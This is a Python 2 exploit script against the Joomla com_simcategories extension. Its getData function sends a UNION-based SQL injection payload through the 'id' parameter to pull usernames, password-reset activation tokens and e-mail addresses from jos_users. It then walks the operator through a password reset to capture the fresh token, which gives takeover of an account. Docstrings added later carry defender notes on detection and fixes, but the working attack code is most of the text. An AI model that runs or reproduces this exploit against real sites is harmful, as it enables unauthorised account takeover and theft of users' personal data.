import re
import urllib2
import webbrowser
from urllib import urlencode
from sys import argv, exit

# Module-level scratch store written by getData() and read by exploits():
# key 0 -> username, key 1 -> activation value, key 2 -> e-mail address.
# NOTE(review): this name shadows the builtin `dict` for the whole module.
dict = {}

def main():
    """Command-line driver: print the banner, obtain the site URL, run the checks.

    The URL is taken from the first command-line argument; when none is given
    the script prints a usage example ('Vi du' = "example") and prompts for it
    ('Duong dan site' = "site URL"). The process exits when checkSite()
    returns 0; otherwise control passes to exploits().

    Reviewer note: nothing here validates the URL, and the value is expected
    to end in ``index.php`` (see the usage example), because the later
    requests are built by appending a query string directly to it.
    """
    banner_lines = (
        'Joomla com_simcategories exploits\n',
        'Made By SilverWolf (http://nicedesigns.vv.si/)\n',
        'http://facebook.com/soibac\n',
    )
    print ''.join(banner_lines)

    if len(argv) >= 2:
        site = argv[1]
    else:
        # Derive the bare script name from argv[0] for the usage line,
        # normalising Windows path separators first.
        script_name = argv[0].replace('\\', '/').split('/')[-1]
        print 'Vi du: ' + script_name + ' http://target.com/index.php\n'
        site = raw_input('Duong dan site: ')

    if checkSite(site) == 0:
        exit()
    exploits(site)
        
def checkIfSiteExists(s):
    """Fetch *s* and report whether the server returned a non-empty body.

    Returns 1 when the response body is non-empty, 0 otherwise. The request
    uses a 120-second timeout. Errors raised by ``urllib2.urlopen`` are not
    caught here and propagate to the caller.

    Defender note: this is a plain GET of the supplied URL with urllib2's
    default request headers, so on its own it looks like any scripted client
    in an access log.
    """
    # 'Kiem tra su ton tai cua site' = "checking that the site exists"
    print 'Kiem tra su ton tai cua site...'
    body = urllib2.urlopen(s, None, 120).read()
    if not body:
        print "-->ERR"
        return 0
    print "-->OK"
    return 1
    
def checkIfAdminExists(s):
    """Check that ``<base>/administrator/`` serves a page with the login marker.

    The base is formed by cutting ``len('index.php')`` characters off the end
    of *s*; ``administrator/`` is then appended and the page fetched with a
    120-second timeout. Returns 1 when the body contains
    ``<p id="form-login-username">``, 0 when the body is empty or the marker
    is absent.

    NOTE(review): the trailing nine characters are removed unconditionally;
    nothing verifies that *s* actually ends with ``index.php``.

    Defender note: a scripted GET of ``administrator/`` arriving next to
    requests for the reset page and the com_simcategories component is a
    useful correlation point in access logs. Restricting the administrator
    path by source address or an extra authentication layer limits what a
    reset account can be used for.
    """
    # "checking that the administrator login exists"
    print 'Kiem tra su ton tai cua administrator login...'
    base = s[:len(s) - len('index.php')]
    admin_url = base + 'administrator/'
    print admin_url
    page = urllib2.urlopen(admin_url, None, 120).read()
    if page and '<p id="form-login-username">' in page:
        print "-->OK"
        return 1
    print "-->ERR"
    return 0
            
    
def checkIfResetPasswordExist(s):
    """Check that the password-reset page is reachable and shows an e-mail field.

    Appends ``?option=com_user&view=reset`` to *s*, fetches it with a
    120-second timeout, and returns 1 when the body contains
    ``<input id="email" name="email" type="text"``; returns 0 when the body
    is empty or the field is absent.

    Defender note: the rest of the script depends on this page being publicly
    reachable. Where self-service reset is not needed, disabling it removes
    the step that turns a database read into an account takeover.
    ``com_user`` is presumably the Joomla 1.5-era user component -- confirm
    against the deployed version.
    """
    # "checking that the password reset page exists"
    print 'Kiem tra su ton tai cua trang reset pass....'
    reset_url = s + '?option=com_user&view=reset'
    page = urllib2.urlopen(reset_url, None, 120).read()
    has_form = bool(page) and '<input id="email" name="email" type="text"' in page
    if has_form:
        print "-->OK"
        return 1
    print "-->ERR"
    return 0
    
def checkSite(s):
    """Run the three precondition probes in order and stop at the first failure.

    Order: site reachable, reset page present, administrator login present.
    Returns 0 as soon as one of the first two probes returns 0; otherwise
    returns the result of the administrator probe (1 or 0).
    """
    for probe in (checkIfSiteExists, checkIfResetPasswordExist):
        if probe(s) == 0:
            return 0
    return checkIfAdminExists(s)
    
def exploits(s):
    """Drive the reset-token flow using the values that getData() stores.

    Sequence as coded: call getData() once to populate the module-level
    ``dict``; print the stored e-mail address and open the reset page in the
    local web browser for the operator to submit by hand; wait for a key
    press; call getData() again and print the stored activation value. The
    process exits if either getData() call returns 0.

    Defender notes:
      * The flow produces an ordered trail from one client: a
        com_simcategories request, a ``com_user&view=reset`` request, then a
        second com_simcategories request. Correlating the three is a stronger
        signal than any one of them.
      * The reset submission presumably causes a reset e-mail to be sent to
        the account owner; an unrequested reset mail is a user-visible
        indicator worth routing to the security team.
      * The root cause is the SQL injection exposing the ``activation``
        column; a reset token readable from the database is equivalent to
        the password. Fix the injection, and treat every account with a
        non-empty activation value during the exposure window as compromised.

    NOTE(review): getData() returns None (not 0) on an empty response body,
    so the ``== 0`` checks below do not stop on that path.
    """
    if getData(s) == 0:
        exit()
    action = "?option=com_user&view=reset"
    # "enter this e-mail address in the form and submit"
    print "Dien email nay vao form va submit: " + dict[2]
    # Opens the reset page in the operator's browser; submission is manual.
    webbrowser.open(s + action)
    # "press any key to fetch the activation value"
    raw_input('Bam key bat ky de lay activation')
    # Second read: picks up the activation value as stored after the reset request.
    if getData(s) == 0:
        exit()
    # "enter the activation key in the form"
    print "Dien activation key vao form: " + dict[1]
    # "have fun"
    print "CHUC VUI VE..."
    
def getData(s):
    """Send the injected request and parse username, activation and e-mail.

    Appends a fixed query string to *s*, fetches the URL with a 120-second
    timeout, and searches the body for a record wrapped in ``$$$`` markers
    with ``|`` between fields. The three fields are stored in the
    module-level ``dict`` under keys 0, 1 and 2 and echoed to stdout.

    Returns 1 on success and 0 when no ``$$$`` marker is present in the body.
    NOTE(review): an empty body falls off the end and returns None; a missing
    closing marker or fewer than three fields is not handled either.

    Defender notes:
      * Injection point: the ``id`` parameter of
        ``option=com_simcategories&view=simprovider``. The value starts with
        a quote character followed by a UNION SELECT, so the component
        presumably concatenates ``id`` into a quoted SQL string. The fix is
        to cast ``id`` to an integer or bind it as a parameter, and to remove
        or update the extension.
      * The SQL keywords are wrapped in MySQL ``/*! ... */`` comments, which
        MySQL still executes. Filters that match bare keywords without
        normalising comments will miss this form.
      * ``0x24`` is ``$`` and ``0x7c`` is ``|``: they build the delimiters
        this function parses, and they also show up in the served page, which
        makes response-side detection possible.
      * The query reads ``username``, ``activation`` and ``email`` from
        ``jos_users``. A non-default table prefix would break this exact
        string but does not fix the underlying injection.
      * Log indicators: requests for ``option=com_simcategories`` whose
        ``id`` contains a quote, ``UNION``, ``group_concat`` or
        ``jos_users``; the client is urllib2 with its default headers.
    """
    sqli = "?option=com_simcategories&view=simprovider&id=-1'%20/*!UNION*/%20/*!SELECT*/%201,group_concat(0x24,0x24,0x24,username,0x7c,activation,0x7c,email,0x24,0x24,0x24),3,4,5,6,7%20from%20jos_users--%20-"
    url = s + sqli
    #print url
    htmlRes = urllib2.urlopen(url ,None, 120).read()
    if htmlRes:
        # Opening marker of the first record reflected in the page.
        begin = htmlRes.find("$$$")
        if begin == -1:
            # "could not perform the SQL injection"
            print "Khong the thuc hien sql injection...\n"
            print url
            return 0
        # Closing marker; only the first record between markers is used.
        end = htmlRes.find("$$$",begin + 1)
        data = htmlRes[begin+3:end]
        print data
        # Field order follows the query: username | activation | email.
        arr = data.split("|")
        dict[0] = arr[0]
        dict[1] = arr[1]
        dict[2] = arr[2]
        print "----------------------------"
        print "Username: " + dict[0] + "\n"
        print "Activation: " + dict[1] + "\n"
        print "Email: " + dict[2] + "\n"
        print "----------------------------"
        return 1
        
# Run the command-line flow only when the file is executed as a script,
# not when it is imported.
if __name__ == '__main__':
    main()  